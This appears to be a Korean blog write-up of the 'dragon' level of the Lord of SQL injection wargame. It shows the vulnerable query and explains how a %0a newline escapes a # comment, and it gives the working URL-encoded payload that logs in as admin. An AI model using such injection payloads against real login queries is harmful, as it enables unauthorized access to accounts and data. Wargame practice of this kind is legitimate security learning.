소스코드 분석
$query = "select id from prob_dragon where id='guest'# and pw='{$_GET[pw]}'";
쿼리를 보게 되면 id='guest'# 주석이 달려있다.
%0a 줄바꿈 문자를 사용하여 우회한다.
select id from prob_dragon where id='guest'# and pw='%0a and pw='123' or id='admin'
-> select id from prob_dragon where id='guest' and pw='123' or id='admin'
?pw=%0a%20and%20pw=%27%27%20or%20id=%27admin
pw=%0a and pw='' or id='admin
'WarGame > Web' 카테고리의 다른 글
| [Lord of SQL injection] dark_eyes (0) | 2017.06.02 |
|---|---|
| [Lord of SQL injection] iron_golem (0) | 2017.06.02 |
| [Lord of SQL injection] xavis (0) | 2017.06.01 |
| [Lord of SQL injection] nightmare (0) | 2017.05.28 |
| [Lord of SQL injection] succubus (0) | 2017.05.28 |
